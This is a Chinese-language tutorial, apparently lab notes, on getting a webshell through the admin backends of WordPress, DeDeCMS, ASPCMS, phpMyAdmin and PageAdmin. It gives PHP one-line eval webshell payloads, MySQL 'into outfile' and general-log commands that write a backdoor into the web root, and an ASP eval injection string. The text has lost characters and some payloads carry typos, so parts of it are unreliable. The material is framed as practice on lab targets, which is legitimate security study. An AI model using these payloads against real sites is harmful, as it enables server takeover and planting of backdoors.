一、WordPress

????????姿勢一

1.下載vulhub靶場

cd /vulhub/wordpress/pwnscriptum
docker-compose up -d

2.我們進入后臺，網址拼接/wp-admin/

3.我們進入WP的模板寫入一句話木馬后門并訪問其文件即可GetShell

4然后我們拼接以下路徑/wp-content/themes/twentyfifteen/404.php，訪問

????????姿勢二

1.按照以下步驟上傳一個包含木馬的主題壓縮包

2.安裝成功后訪問主題下的網站后門文件，拼接以下路徑/wp-content/themes/qzdy-master/1.php

二、DeDeCMS

????????姿勢一

1.我們下載安裝號靶場之后打開網站并進入后臺，然后按照以下步驟上傳文件

2.上傳成功之后，我們就可以進行webshell連接了

????????姿勢二

1.找到模板管理的地方，我們找一個文件來加入一句話木馬

2.然后將網頁更新一下

3.然后訪問一下，即可看到結果

???????

?????????姿勢三

1.我們按以下步驟找到執行sql命令的地方，執行以下命令來運行

select @@basedir
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/'

三、ASPCMS

????????姿勢一

1.下載好靶機之后，打開并進入后臺。后臺路徑為/admin aspcms/index.asp

2.抓包后更改修改 slideTextStatus 字段的值內容，要保證人家原有的%>能夠閉合

%25><%25eval (request(chr(65)))%25><%25

四、PhPMyadmin

????????姿勢一

1.下載后靶場之后打開靶場，找到執行sql語句的地方

2.依次找到以下的地方，將日志文件打開，將日志文件的存儲位置改為網站根目錄

3.然后在輸入sql的地方輸入以下內容，然后在訪問日志文件即可，也可以依次輸入以下內容

show global variables like'%general%';
set global general log='on';    //日志保存狀態開啟
set global general log_file ='L:/phpstudy_pro/Www/888.php'    //修改日志的保存位置
show global variables like:'%general%'
select'<?php eval($ POST[cmd]);?>';

????????姿勢二

1.依次輸入以下內容，將木馬寫入到一個文件中去

select @@datadir
select "<?php eval($ PosT[a]);?>" into outfile 'L:/phpstudy_pro/ww/89.php'

五、Pageadmin

????????姿勢一

1.我們下載后靶機后打開后臺，找到上傳模板的地方 ，上傳一個包含木馬的模板壓縮包

????????姿勢二

1.找到上傳文件的地方，上傳一個壓縮后的木馬文件（當然官方的可以上傳）